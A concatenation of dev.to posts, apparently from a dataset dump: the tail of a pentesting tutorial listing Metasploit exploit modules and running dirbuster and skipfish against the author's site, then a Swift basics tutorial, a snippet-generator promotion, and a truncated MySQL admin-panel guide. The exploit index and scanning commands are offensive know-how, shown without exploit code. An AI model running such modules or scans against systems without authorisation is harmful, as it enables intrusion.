Buffer Overflow 21 exploit/windows/misc/allmediaserver_bof 2012-07-04 normal No ALLMediaServer 0.8 Buffer Overflow 22 exploit/windows/fileformat/allplayer_m3u_bof 2013-10-09 normal No ALLPlayer M3U Buffer Overflow 23 exploit/windows/fileformat/aol_phobos_bof 2010-01-20 average No AOL 9.5 Phobos.Playlist Import() Stack-based Buffer Overflow 24 exploit/windows/fileformat/aol_desktop_linktag 2011-01-31 normal No AOL Desktop 9.6 RTX Buffer Overflow 25 exploit/windows/browser/aim_goaway 2004-08-09 great No AOL Instant Messenger goaway Overflow 26 exploit/windows/browser/aol_ampx_convertfile 2009-05-19 normal No AOL Radio AmpX ActiveX Control ConvertFile() Buffer Overflow 27 exploit/linux/local/apt_package_manager_persistence 1999-03-09 excellent No APT Package Manager Persistence 28 exploit/windows/browser/asus_net4switch_ipswcom 2012-02-17 normal No ASUS Net4Switch ipswcom.dll ActiveX Stack Buffer Overflow 29 exploit/linux/misc/asus_infosvr_auth_bypass_exec 2015-01-04 excellent No ASUS infosvr Auth Bypass Command Execution 30 exploit/linux/http/atutor_filemanager_traversal 2016-03-01 excellent Yes ATutor 2.2.1 Directory Traversal / Remote Code Execution 31 exploit/multi/http/atutor_sqli 2016-03-01 excellent Yes ATutor 2.2.1 SQL Injection / Remote Code Execution 32 exploit/multi/http/atutor_upload_traversal 2019-05-17 excellent Yes ATutor 2.2.4 - Directory Traversal / Remote Code Execution, 33 exploit/unix/webapp/awstatstotals_multisort 2008-08-26 excellent Yes AWStats Totals multisort Remote Command Execution 34 exploit/unix/webapp/awstats_configdir_exec 2005-01-15 excellent Yes AWStats configdir Remote Command Execution 35 exploit/unix/webapp/awstats_migrate_exec . . . . . . . . . . . 2454 exploit/windows/http/edirectory_imonitor 2005-08-11 great No eDirectory 8.7.3 iMonitor Remote Stack Buffer Overflow 2455 exploit/windows/misc/eiqnetworks_esa 2006-07-24 average No eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow 2456 exploit/windows/misc/eiqnetworks_esa_topology 2006-07-25 average No eIQNetworks ESA Topology DELETEDEVICE Overflow 2457 exploit/linux/antivirus/escan_password_exec 2014-04-04 excellent Yes eScan Web Management Console Command Injection 2458 exploit/windows/fileformat/esignal_styletemplate_bof 2011-09-06 normal No eSignal and eSignal Pro File Parsing Buffer Overflow in QUO 2459 exploit/multi/http/extplorer_upload_exec 2012-12-31 excellent Yes eXtplorer v2.1 Arbitrary File Upload Vulnerability 2460 exploit/windows/fileformat/ezip_wizard_bof 2009-03-09 good No eZip Wizard 3.0 Stack Buffer Overflow 2461 exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection 2019-02-26 excellent Yes elFinder PHP Connector exiftran Command Injection 2462 exploit/windows/ftp/freeftpd_user 2005-11-16 average Yes freeFTPd 1.0 Username Overflow 2463 exploit/windows/ftp/freeftpd_pass 2013-08-20 normal Yes freeFTPd PASS Command Buffer Overflow 2464 exploit/windows/fileformat/galan_fileformat_bof 2009-12-07 normal No gAlan 0.2.1 Buffer Overflow 2465 exploit/linux/local/glibc_origin_expansion_priv_esc 2010-10-18 excellent Yes glibc '$ORIGIN' Expansion Privilege Escalation 2466 exploit/linux/local/glibc_realpath_priv_esc 2018-01-16 normal Yes glibc 'realpath()' Privilege Escalation 2467 exploit/linux/local/glibc_ld_audit_dso_load_priv_esc 2010-10-18 excellent Yes glibc LD_AUDIT Arbitrary DSO Load Privilege Escalation 2468 exploit/windows/fileformat/iftp_schedule_bof 2014-11-06 normal No i-FTP Schedule Buffer Overflow 2469 auxiliary/dos/apple_ios/webkit_backdrop_filter_blur 2018-09-15 normal No iOS Safari Denial of Service with CSS 2470 exploit/windows/local/ipass_launch_app 2015-03-12 excellent Yes iPass Mobile Client Service Privilege Escalation 2471 exploit/aix/local/ibstat_path 2013-09-24 excellent Yes ibstat $PATH Privilege Escalation 2472 exploit/qnx/local/ifwatchd_priv_esc 2014-03-10 excellent Yes ifwatchd Privilege Escalation 2473 exploit/windows/browser/lpviewer_url 2008-10-06 normal No iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow 2474 exploit/linux/local/ktsuss_suid_priv_esc 2011-08-13 excellent Yes ktsuss suid Privilege Escalation 2475 exploit/linux/local/lastore_daemon_dbus_priv_esc 2016-02-02 excellent Yes lastore-daemon D-Bus Privilege Escalation 2476 auxiliary/scanner/ssh/libssh_auth_bypass 2018-10-16 normal No libssh Authentication Bypass Scanner 2477 exploit/windows/browser/mirc_irc_url 2003-10-13 normal No mIRC IRC URL Buffer Overflow 2478 exploit/windows/misc/mirc_privmsg_server 2008-10-02 normal No mIRC PRIVMSG Handling Stack Buffer Overflow 2479 exploit/osx/browser/osx_gatekeeper_bypass 2021-03-25 manual No macOS Gatekeeper check bypass 2480 exploit/osx/local/cfprefsd_race_condition 2020-03-18 excellent Yes macOS cfprefsd Arbitrary File Write Local Privilege Escalation 2481 auxiliary/dos/http/marked_redos normal No marked npm module "heading" ReDoS 2482 exploit/unix/webapp/mybb_backdoor 2011-10-06 excellent Yes myBB 1.6.4 Backdoor Arbitrary Command Execution 2483 exploit/linux/http/op5_config_exec 2016-04-08 excellent Yes op5 v7.1.9 Configuration Command Execution 2484 exploit/unix/webapp/opensis_chain_exec 2020-06-30 excellent Yes openSIS Unauthenticated PHP Code Execution 2485 exploit/unix/webapp/oscommerce_filemanager 2009-08-31 excellent No osCommerce 2.2 Arbitrary PHP Code Execution 2486 exploit/multi/http/oscommerce_installer_unauth_code_exec 2018-04-30 excellent Yes osCommerce Installer Unauthenticated Code Execution 2487 auxiliary/sniffer/psnuffle normal No pSnuffle Packet Sniffer 2488 exploit/unix/http/pfsense_graph_injection_exec 2016-04-18 excellent No pfSense authenticated graph status RCE 2489 exploit/unix/http/pfsense_group_member_exec 2017-11-06 excellent Yes pfSense authenticated group member RCE 2490 exploit/linux/http/php_imap_open_rce 2018-10-23 good Yes php imap_open Remote Code Execution 2491 exploit/unix/webapp/phpbb_highlight 2004-11-12 excellent No phpBB viewtopic.php Arbitrary Code Execution 2492 exploit/unix/webapp/phpcollab_upload_exec 2017-09-29 excellent Yes phpCollab 2.5.1 Unauthenticated File Upload 2493 exploit/multi/http/phpfilemanager_rce 2015-08-28 excellent Yes phpFileManager 0.9.8 Remote Code Execution 2494 exploit/multi/http/phpldapadmin_query_engine 2011-10-24 excellent Yes phpLDAPadmin query_engine Remote PHP Code Injection 2495 exploit/multi/http/phpmyadmin_3522_backdoor 2012-09-25 normal No phpMyAdmin 3.5.2.2 server_sync.php Backdoor 2496 exploit/multi/http/phpmyadmin_lfi_rce 2018-06-19 good Yes phpMyAdmin Authenticated Remote Code Execution 2497 exploit/multi/http/phpmyadmin_null_termination_exec 2016-06-23 excellent Yes phpMyAdmin Authenticated Remote Code Execution 2498 exploit/multi/http/phpmyadmin_preg_replace 2013-04-25 excellent Yes phpMyAdmin Authenticated Remote Code Execution via preg_replace() 2499 exploit/multi/http/phpscheduleit_start_date 2008-10-01 excellent Yes phpScheduleIt PHP reserve.php start_date Parameter Arbitrary Code Injection 2500 exploit/linux/local/ptrace_sudo_token_priv_esc 2019-03-24 excellent Yes ptrace Sudo Token Privilege Escalation 2501 exploit/multi/http/qdpm_upload_exec 2012-06-14 excellent Yes qdPM v7 Arbitrary PHP File Upload Vulnerability 2502 exploit/unix/webapp/rconfig_install_cmd_exec 2019-10-28 excellent Yes rConfig install Command Execution 2503 exploit/linux/local/rc_local_persistence 1980-10-01 excellent No rc.local Persistence 2504 exploit/unix/http/tnftp_savefile 2014-10-28 excellent No tnftp "savefile" Arbitrary Command Execution 2505 auxiliary/dos/http/ua_parser_js_redos normal No ua-parser-js npm module ReDoS 2506 exploit/multi/http/v0pcr3w_exec 2013-03-23 great Yes v0pCr3w Web Shell Remote Code Execution 2507 exploit/multi/http/vbseo_proc_deutf 2012-01-23 excellent Yes vBSEO proc_deutf() Remote PHP Code Injection 2508 auxiliary/gather/vbulletin_getindexablecontent_sqli 2020-03-12 normal No vBulletin /ajax/api/content_infraction/getIndexableContent nodeid Parameter SQL Injection 2509 exploit/multi/http/vbulletin_getindexablecontent 2020-03-12 manual Yes vBulletin /ajax/api/content_infraction/getIndexableContent nodeid Parameter SQL Injection 2510 exploit/multi/http/vbulletin_unserialize 2015-11-04 excellent Yes vBulletin 5.1.2 Unserialize Code Execution 2511 exploit/multi/http/vbulletin_widget_template_rce 2020-08-09 excellent Yes vBulletin 5.x /ajax/render/widget_tabbedcontainer_tab_panel PHP remote code execution. 2512 auxiliary/admin/http/vbulletin_upgrade_admin 2013-10-09 normal No vBulletin Administrator Account Creation 2513 auxiliary/gather/vbulletin_vote_sqli 2013-03-24 normal Yes vBulletin Password Collector via nodeid SQL Injection 2514 exploit/unix/webapp/vbulletin_vote_sqli_exec 2013-03-25 excellent Yes vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection 2515 exploit/unix/webapp/php_vbulletin_template 2005-02-25 excellent Yes vBulletin misc.php Template Name Arbitrary Code Execution 2516 exploit/multi/http/vbulletin_widgetconfig_rce 2019-09-23 excellent Yes vBulletin widgetConfig RCE 2517 exploit/multi/http/vtiger_soap_upload 2013-03-26 excellent Yes vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload 2518 exploit/multi/http/vtiger_php_exec 2013-10-30 excellent Yes vTigerCRM v5.4.0/v5.3.0 Authenticated Remote Code Execution 2519 exploit/multi/misc/w3tw0rk_exec 2015-06-04 excellent Yes w3tw0rk / Pitbul IRC Bot Remote Code Execution 2520 auxiliary/dos/http/ws_dos normal No ws - Denial of Service 2521 exploit/windows/fileformat/xradio_xrl_sehbof 2011-02-08 normal No xRadio 0.95b Buffer Overflow 2522 exploit/unix/http/xdebug_unauth_exec 2017-09-17 excellent Yes xdebug Unauthenticated OS Command Execution Interact with a module by name or index. For example info 2522, use 2522 or use exploit/unix/http/xdebug_unauth_exec ``` ## Use Owasp dirbuster <hr> Lauch dirbuster ```bash dirbuster ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/m1x0ejs0v5nfwn8j0mtz.png) complete the information. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/wapn0llpubslvtkxgzt8.png) # exploitation * ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ywc9wgq8on3c16botw88.png) * ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/1khn5hwfij6erj722es5.png) * ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/l3dqnknik6y2hjsikxci.png) ## Use skipfish Launch ```bash skipfish -o /home/samglish/Desktop/SamRapport -S /usr/share/skipfish/dictionaries/minimal.wl http://samglishinc.000webhostapp.com ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/35yi5mad7unupxcetng2.png) Go to SamRapport ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ejet57pjhz43zx26r062.png) Open index.html in your browser ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/bf13txbuopzrkyamujaq.png)
samglish
1,912,668
Swift Essentials: Variables, Data Types, and More (Part 1)
I'm diving headfirst into the "100 Days of SwiftUI" challenge by Paul Hudson, and I'm thrilled to be...
27,965
2024-07-05T11:19:49
https://ionixjunior.dev/swift-essentials-variables-data-types-and-more-part-1/
100daysofswiftui
--- title: Swift Essentials: Variables, Data Types, and More (Part 1) published: true date: 2024-07-05 00:00:00 UTC tags: 100DaysOfSwiftUI canonical_url: https://ionixjunior.dev/swift-essentials-variables-data-types-and-more-part-1/ cover_image: https://ionixjuniordevthumbnail.azurewebsites.net/api/Generate?title=Swift+Essentials%3A+Variables%2C+Data+Types%2C+and+More+%28Part+1%29 series: 100-days-of-swiftui --- I'm diving headfirst into the "100 Days of SwiftUI" challenge by Paul Hudson, and I'm thrilled to be on this journey of discovery. But before I can create dazzling iOS apps, I know that building a strong foundation in Swift is crucial. This blog series, which I'm calling "100DaysOfSwiftUI," is my way of sharing my learning journey with you, especially those who are new to Swift. We'll explore the fundamental building blocks of this powerful language together. In this first part, we'll tackle the core concepts of variables, data types, string interpolation, and enums. These seemingly simple elements are the pillars upon which we'll build more complex and powerful applications in SwiftUI. So buckle up, grab your coffee (or your preferred drink!), and let's embark on this journey together! We'll cover the basics in a clear and engaging way, and by the end, you'll have a solid grasp of the foundational concepts that will empower you to start crafting your own iOS apps. If you don’t know about the [100 Days of SwiftUI](https://www.hackingwithswift.com/100/swiftui), please check out this link. ## Variables and Constants: Storing Data with Flexibility and Immutability In the world of programming, we often need to store data. We have two primary tools for doing this: **variables** and **constants**. Both act as containers for data, but they differ in their flexibility: ### Variables: The Changeable Ones Variables are like labeled boxes in our code that hold data that can be modified. We use the `var` keyword to declare a variable: ```swift var name = "Laura" ``` We can change the value of `name` at any point in our code: ```swift name = "Laura Smith" ``` Now, `name` holds the value “Laura Smith”. ### Constants: The Immutable Ones Constants are like sealed containers. Once you define a constant, its value cannot be changed. We use the `let` keyword to declare a constant: ```swift let name = "Laura" ``` This sets `name` to the value “Laura”, and we cannot assign a different value to it later. Constants are good for preventing accidental changes to important values, ensuring data integrity. They also make your code clearer and more predictable, as the values they hold are fixed. So, consider this when deciding how to use variables and constants in your code. ## Data Types: Defining the Nature of Data In programming, we need a way to categorize the kinds of data our variables and constants can hold. These categories are called **data types**. Think of data types as defining the “nature” or “essence” of the data. They tell Swift how to interpret and manipulate the information. Here are some essential data types in Swift: ### String: For Textual Data The `String` data type represents textual information. It’s used to store anything that can be written or displayed, such as names, addresses, sentences, and even code. ```swift let name = "Laura" var message = "Hello!" ``` ### Int: For Whole Numbers The `Int` data type represents whole numbers (integers), such as 1, 10, 25, 1000, and so on. Integers are commonly used in counters, calculations, and for representing quantities. ```swift let age = 30 var numberOfItems = 5 ``` ### Float, Double and Decimal: Representing Numbers with Precision In Swift, we have three primary data types for representing numbers with decimal points: `Float`, `Double`, and `Decimal`. While they all handle fractional values, they differ in their precision and memory usage: #### Float: Lower Precision, Smaller Range `Float` uses 32 bits of memory to store its value, offering a smaller range of values and less precision than `Double`. It’s generally used when memory efficiency is a priority and lower precision is acceptable. ```swift let floatNumber: Float = 0.00001 ``` #### Double: High Precision, Large Range `Double` is the most common choice for representing floating-point numbers in Swift. It provides a high degree of precision, making it suitable for calculations requiring a wide range of values. `Double` uses 64 bits of memory to store its value, which is twice the size of `Float`. ```swift let doubleNumber: Double = 0.00001 ``` #### Decimal: High Precision, Financial Calculations `Decimal` is specialized for handling financial calculations where accuracy is paramount. It offers a high degree of precision, especially for numbers with a large number of decimal places. However, it is less computationally efficient than `Double` or `Float` due to its focus on accuracy. `Decimal` is a base-10 number representation that provides high precision, allowing you to store a lot of numbers. To create a `Decimal` value, you can use the following syntax: ```swift let decimalNumber: Decimal = 0.00001 ``` #### Type Annotations As you can see in the samples above, there’s only one keyword that changed in these examples: the type. Here, the type defines what kind of numeric value you’ll store. This is called “type annotations,” and you can use it for all data types or structures. You can create a numeric value simply by creating a variable and assigning a value, but it will be created as a `Double` type by default. ### Bool: For Logical Values The `Bool` data type represents boolean values, which can be either `true` or `false`. Bools are fundamental for decision-making in your code, helping you create conditional statements and logical expressions. ```swift let isAdmin = true var hasError = false ``` ## Arrays, Dictionaries, and Sets So far, we’ve explored data types for individual values: strings, numbers, booleans. But often, we need to store collections of data—multiple values related to each other. This is where arrays, dictionaries, and sets come in handy. ### Arrays: Ordered Collections of Values Arrays are ordered lists of elements of the same data type. Think of them as numbered boxes where you can store a collection of related items. You access elements in an array by their index, starting from zero. ```swift let cities = ["Barcelona", "London", "São Paulo"] print(cities[0]) // Output: Barcelona (first element) print(cities[2]) // Output: São Paulo (third element) ``` Arrays are useful when you need an ordered list of elements of the same type. ### Dictionaries: Key-Value Pairs Dictionaries are unordered collections of key-value pairs. Each key is unique and maps to a corresponding value. Think of dictionaries like a real-world dictionary, where each word (key) has a definition (value). ```swift let userData = ["name": "Laura", "surname": "Smith", "city": "London"] print(userData["name"]) // Output: Optional("Laura") print(userData["city"]) // Output: Optional("London") ``` Dictionaries are useful when you need to store and retrieve data based on unique keys. ### Sets: Unique and Unordered Collections Sets are unordered collections of unique elements. They don’t allow duplicates, making them useful for checking membership and removing duplicates from a collection. ```swift let uniqueNames = Set(["Laura", "Josh", "Laura", "Marie", "Josh"]) print(uniqueNames.count) // Output: 3 (duplicates removed) ``` Sets are useful when you need to work with unique values or when you want to check for membership quickly - this structure is very fast. ## Enums: Defining Related Values Enums, short for enumerations, are a powerful way to define a custom type that represents a set of related values. They provide a more structured and readable way to represent choices or states within your code, compared to using raw integers. Think of enums as creating a vocabulary of specific terms related to a particular concept. For example, imagine you’re building an app that handles order status. Instead of using raw integers like 0, 1, and 2, you can create an enum to represent the order states: ```swift enum OrderStatus { case pending case processing case shipped case delivered case cancelled } ``` Now, instead of using numbers, you can directly use the enum values: ```swift var orderStatus = OrderStatus.pending print(orderStatus) // Output: OrderStatus.pending ``` Enums improve readability. They make your code more self-documenting and easier to understand. They also enforce type safety, preventing you from accidentally assigning incorrect values. ## Cool Things ### String Interpolation An easy way to concatenate strings without using “+” is using interpolation: ```swift let name = "Laura" let surname = "Smith" print("The name of the winner is \(name) \(surname)!") ``` ### Multi-line Strings Sometimes we need to create a multi-line string, and this is very easy in Swift. You just use triple quotes and write your string inside them. Just ensure that the triple quotes are declared on a different line from the string. ```swift var multilineMessage = """ This is the multi-line message. You can add a lot of lines. Don't worry about it! """ ``` ### Bools and the Toggle Function When you create a variable, you can change its value later. So, we can create a bool value and change it using the `toggle` function. ```swift var isAdmin = false print(isAdmin) // Output: false isAdmin.toggle() print(isAdmin) // Output: true ``` ### Dictionary Default As you can see in the dictionary example, when we access the key, we get an optional. This occurs because Swift can’t ensure that there is a value in that key. Because of this, Swift gives us an optional. You can handle this using a property called `default`. This way you don’t get an optional, and your code won’t break if you handle the optional without careful. ```swift let userData = ["name": "Laura", "surname": "Smith", "city": "London"] print(userData["name"]) // Output: Optional("Laura") print(userData["name", default: "Unknown"]) // Output: Laura print(userData["nickname", default: "Unknown"]) // Output: Unknown ``` ## Conclusion We’ve covered a lot of ground in this first part of “100DaysOfSwiftUI”! We’ve explored variables, constants, data types, string interpolation, enums, and some collection types. These concepts are essential for understanding how data is stored, manipulated, and used in your code. Understanding these fundamentals is like having a solid foundation upon which you can build more complex structures in your SwiftUI journey. Imagine them as the bricks and mortar that make up the walls of your iOS apps. I encourage you to practice these concepts, experiment with different examples, and don’t hesitate to ask questions. Share your thoughts and experiences in the comments below! Stay tuned for the next part, and let’s continue to build our Swift knowledge together!
ionixjunior
1,912,053
SnippetEase - Free Code Snippet Generator
Are you a tech content writer wanting to share your code on your website in a fancy way? Are you...
0
2024-07-04T23:56:51
https://dev.to/munjitso/snippetease-free-code-snippet-generator-f79
![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/qdnzmfdpcxx0zaer3y5d.png) Are you a tech content writer wanting to share your code on your website in a fancy way? Are you bored of the default code snippet style that your theme is forcing you to use? We found a solution for you, and it is totally free. Introducing [SnippetEase](https://devtool.site/), a free code snippet generator that transforms the way you share code on your blog. With SnippetEase, you can present your code elegantly and professionally, making it easier for your readers to understand and appreciate your work. The best part? It works seamlessly on both Blogger and WordPress, or any website that supports custom HTML. Key Features of SnippetEase: - Customizable Design: Tailor the look of your code snippets to match your blog's aesthetic. - Easy Integration: Simple to use and integrate, even if you're not a coding expert. - Multi-Platform Compatibility: Perfect for Blogger, WordPress, and any site that supports custom HTML. - Free to Use: Enjoy all these features without spending a dime. How to use SnippetEase on Wordpress: First, type or paste your code on SnippetEase, choose your language and your theme, then see in the preview section if you like it or not. After getting the results you desire, click on "Generate and Copy Styled HTML", this will automatically copy a html code that represents your code snippet. Now, go to Wordpress, create a post, and for the block, select "Custom HTML" and paste the HTML code in that block. Congratulations, you will now have something like this: ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/snby2ca8i1ijhfdq8cyq.png) Check out [our Mechatronics Blog](https://munjitso.engineer/) to learn more and to support us. Say goodbye to bland, default code snippets and hello to a more engaging and visually appealing way to share your knowledge. Try [SnippetEase](https://devtool.site/) today and enhance your tech content like never before!
munjitso
1,912,051
How to Build a MySQL Admin Panel (Fast & Easy)
How to Build a MySQL Admin Panel (4 Easy Steps) In this guide, we will walk you through the four...
0
2024-07-04T23:33:43
https://five.co/blog/how-to-build-a-mysql-admin-panel/
mysql, beginners, tutorial, database
<!-- wp:heading --> <h2 class="wp-block-heading">How to Build a MySQL Admin Panel (4 Easy Steps)</h2> <!-- /wp:heading --> <!-- wp:paragraph --> <p>In this guide, we will walk you through the four steps required to build a MySQL admin panel:</p> <!-- /wp:paragraph --> <!-- wp:list {"ordered":true} --> <ol><!-- wp:list-item --> <li><strong>Creating a New Application with Five</strong>: Get started by setting up a new application in the Five environment.</li> <!-- /wp:list-item --> <!-- wp:list-item --> <li><strong>Setting Up a MySQL Database</strong>: Design and create tables and fields for your MySQL database, defining both data and display types.</li> <!-- /wp:list-item --> <!-- wp:list-item --> <li><strong>Developing Forms</strong>: Build user-friendly forms to enable CRUD (Create, Read, Update, Delete) operations on your MySQL database.</li> <!-- /wp:list-item --> <!-- wp:list-item --> <li><strong>Deploying the Application</strong>: Easily launch your admin panel to the cloud.</li> <!-- /wp:list-item --></ol> <!-- /wp:list --> <!-- wp:paragraph --> <p>By following these steps, you'll create a custom MySQL admin panel interface, providing end-users with a graphical user interface or <a href="https://five.co/blog/how-to-create-a-front-end-for-a-mysql-database/">frontend</a> to interact with your data.</p> <!-- /wp:paragraph --> <!-- wp:essential-blocks/table-of-contents {"blockId":"eb-toc-e787t","blockMeta":{"desktop":".eb-toc-e787t.eb-toc-container { max-width:610px; background-color:var(\u002d\u002deb-global-background-color); padding:30px; border-radius:4px; transition:all 0.5s, border 0.5s, border-radius 0.5s, box-shadow 0.5s }.eb-toc-e787t.eb-toc-container .eb-toc-title { text-align:center; cursor:default; color:rgba(255,255,255,1); background-color:rgba(69,136,216,1); font-size:22px; font-weight:normal }.eb-toc-e787t.eb-toc-container .eb-toc-wrapper { background-color:rgba(241,235,218,1); text-align:left }.eb-toc-e787t.eb-toc-container .eb-toc-wrapper li { color:rgba(0,21,36,1); font-size:14px; line-height:1.4em; font-weight:normal }.eb-toc-e787t.eb-toc-container .eb-toc-wrapper li:hover,.eb-toc-e787t.eb-toc-container .eb-toc-wrapper li.eb-toc-active \u003e a { color:var(\u002d\u002deb-global-link-color) }.eb-toc-e787t.eb-toc-container .eb-toc-wrapper li a { color:inherit }.eb-toc-e787t.eb-toc-container .eb-toc-wrapper li svg path { stroke:rgba(0,21,36,1) }.eb-toc-e787t.eb-toc-container .eb-toc-wrapper li:hover svg path { stroke:var(\u002d\u002deb-global-link-color) }.eb-toc-e787t.eb-toc-container .eb-toc-wrapper li a,.eb-toc-e787t.eb-toc-container .eb-toc-wrapper li a:focus { text-decoration:none; background:none }.eb-toc-e787t.eb-toc-container .eb-toc-wrapper li { padding-top:4px }.eb-toc-e787t.eb-toc-container .eb-toc-wrapper .eb-toc__list li:not(:last-child) { padding-bottom:4px }.eb-toc-e787t.eb-toc-container.style-1 .eb-toc__list-wrap \u003e .eb-toc__list li .eb-toc__list { background:#fff; border-radius:4px }","tab":"","mobile":"","editorDesktop":"\n\t\t \n\t\t \n\n\t\t .eb-toc-e787t.eb-toc-container{\n\t\t\t max-width:610px;\n\n\t\t\t background-color:var(\u002d\u002deb-global-background-color);\n\n\t\t\t \n \n\n \n\t\t\t \n padding: 30px;\n\n \n\t\t\t \n \n \n \n\n \n \n border-radius: 4px;\n\n \n \n\n \n\n\n \n\t\t\t transition:all 0.5s, \n border 0.5s, border-radius 0.5s, box-shadow 0.5s\n ;\n\t\t }\n\n\t\t .eb-toc-e787t.eb-toc-container:hover{\n\t\t\t \n \n \n\n\n \n\n \n \n \n\n \n \n\n \n\n \n\t\t }\n\n\t\t .eb-toc-e787t.eb-toc-container .eb-toc-title{\n\t\t\t text-align: center;\n\t\t\t cursor:default;\n\t\t\t color: rgba(255,255,255,1);\n\t\t\t background-color:rgba(69,136,216,1);\n\t\t\t \n\t\t\t \n \n\n \n\t\t\t \n \n font-size: 22px;\n \n font-weight: normal;\n \n \n \n \n \n\n\t\t }\n\n\t\t .eb-toc-e787t.eb-toc-container .eb-toc-wrapper{\n\t\t\t background-color:rgba(241,235,218,1);\n\t\t\t text-align: left;\n\t\t\t \n \n\n \n\t\t }\n\n\t\t .eb-toc-e787t.eb-toc-container .eb-toc-wrapper ul,\n\t\t .eb-toc-e787t.eb-toc-container .eb-toc-wrapper ol\n\t\t {\n\t\t\t \n\t\t\t \n\t\t }\n\n\t\t .eb-toc-e787t.eb-toc-container .eb-toc-wrapper li {\n\t\t\t color:rgba(0,21,36,1);\n\t\t\t \n \n font-size: 14px;\n line-height: 1.4em;\n font-weight: normal;\n \n \n \n \n \n\t\t }\n\n\t\t .eb-toc-e787t.eb-toc-container .eb-toc-wrapper li:hover,\n .eb-toc-e787t.eb-toc-container .eb-toc-wrapper li.eb-toc-active \u003e a{\n\t\t\t color:var(\u002d\u002deb-global-link-color);\n\t\t }\n\n\t\t .eb-toc-e787t.eb-toc-container .eb-toc-wrapper li a {\n\t\t\t color:inherit;\n\t\t }\n\n .eb-toc-e787t.eb-toc-container .eb-toc-wrapper li svg path{\n stroke:rgba(0,21,36,1);\n }\n .eb-toc-e787t.eb-toc-container .eb-toc-wrapper li:hover svg path{\n stroke:var(\u002d\u002deb-global-link-color);\n }\n\n\n\t\t .eb-toc-e787t.eb-toc-container .eb-toc-wrapper li a,\n\t\t .eb-toc-e787t.eb-toc-container .eb-toc-wrapper li a:focus{\n\t\t\t text-decoration:none;\n\t\t\t background:none;\n\t\t }\n\n\t\t \n\n .eb-toc-e787t.eb-toc-container .eb-toc-wrapper li {\n padding-top: 4px;\n }\n\n .eb-toc-e787t.eb-toc-container .eb-toc-wrapper .eb-toc__list li:not(:last-child) {\n padding-bottom: 4px;\n }\n\n \n .eb-toc-e787t.eb-toc-container.style-1 .eb-toc__list-wrap \u003e .eb-toc__list li .eb-toc__list{\n background: #fff;\n \n \n \n \n\n \n \n border-radius: 4px;\n\n \n \n\n \n\n\n \n }\n\n\n\t \n\n\n\t\t .eb-toc-e787t.eb-toc-container .eb-toc-wrapper{\n\t\t\t display:block;\n\t\t }\n\t\t ","editorTab":"\n\t\t \n\t\t .eb-toc-e787t.eb-toc-container{\n\t\t\t \n\n\t\t\t \n \n\n \n\t\t\t \n \n\n \n\t\t\t \n \n \n\n \n\n \n \n \n\n \n \n\n \n\t\t }\n\t\t .eb-toc-e787t.eb-toc-container:hover{\n\t\t\t \n \n \n \n \n \n \n\n \n \n \n\t\t }\n\n\t\t .eb-toc-e787t.eb-toc-container .eb-toc-title{\n\t\t\t \n \n\n \n\t\t\t \n \n \n \n \n\t\t }\n\n\t\t .eb-toc-e787t.eb-toc-container .eb-toc-wrapper{\n\t\t\t \n \n\n \n\t\t }\n\n\t\t .eb-toc-e787t.eb-toc-container .eb-toc-wrapper li{\n\t\t\t \n \n \n \n \n\t\t }\n\n .eb-toc-e787t.eb-toc-container.style-1 .eb-toc__list-wrap \u003e .eb-toc__list li .eb-toc__list{\n \n \n \n\n \n\n \n \n \n\n \n \n\n \n }\n\n\t \n\t\t ","editorMobile":"\n\t\t \n\t\t .eb-toc-e787t.eb-toc-container{\n\t\t\t \n\n\n\t\t\t \n \n\n \n\t\t\t \n \n\n \n\t\t\t \n \n \n\n \n\n \n \n \n\n \n \n \n\t\t }\n\n\t\t .eb-toc-e787t.eb-toc-container:hover{\n\t\t\t \n \n \n\n \n \n \n \n\n \n \n\n \n\t\t }\n\n\t\t .eb-toc-e787t.eb-toc-container .eb-toc-title{\n\t\t\t \n \n\n \n\t\t\t \n \n \n \n \n\t\t }\n\n\t\t .eb-toc-e787t.eb-toc-container .eb-toc-wrapper{\n\t\t\t \n \n\n \n\t\t }\n\n\t\t .eb-toc-e787t.eb-toc-container .eb-toc-wrapper li{\n\t\t\t \n \n \n \n \n\t\t }\n\n .eb-toc-e787t.eb-toc-container.style-1 .eb-toc__list-wrap \u003e .eb-toc__list li .eb-toc__list{\n \n \n \n\n \n\n \n \n \n\n \n \n \n }\n\n\t \n\t "},"headers":[{"level":2,"content":"How to Build a MySQL Admin Panel (4 Easy Steps)","text":"How to Build a MySQL Admin Panel (4 Easy Steps)","link":"how-to-build-a-mysql-admin-panel-4-easy-steps"},{"level":2,"content":"Building a MySQL Admin Panel using Five","text":"Building a MySQL Admin Panel using Five","link":"building-a-mysql-admin-panel-using-five"},{"level":3,"content":"How Five Compares to Traditional Tech Stacks","text":"How Five Compares to Traditional Tech Stacks","link":"how-five-compares-to-traditional-tech-stacks"},{"level":3,"content":"Advantages of Using Five Over Traditional Stacks","text":"Advantages of Using Five Over Traditional Stacks","link":"advantages-of-using-five-over-traditional-stacks"},{"level":2,"content":"Step by Step: How to Build a MySQL Admin Panel","text":"Step by Step: How to Build a MySQL Admin Panel","link":"step-by-step-how-to-build-a-mysql-admin-panel"},{"level":3,"content":"Step 1: Create a New Application with Five","text":"Step 1: Create a New Application with Five","link":"step-1-create-a-new-application-with-five"},{"level":3,"content":"Step 2: Set Up a MySQL Database with Five","text":"Step 2: Set Up a MySQL Database with Five","link":"step-2-set-up-a-mysql-database-with-five"},{"level":3,"content":"Step 3: Develop Forms with Five","text":"Step 3: Develop Forms with Five","link":"step-3-develop-forms-with-five"},{"level":3,"content":"Step 4: Launch the Application","text":"Step 4: Launch the Application","link":"step-4-launch-the-application"},{"level":3,"content":"Understanding the Admin Panel Interface","text":"Understanding the Admin Panel 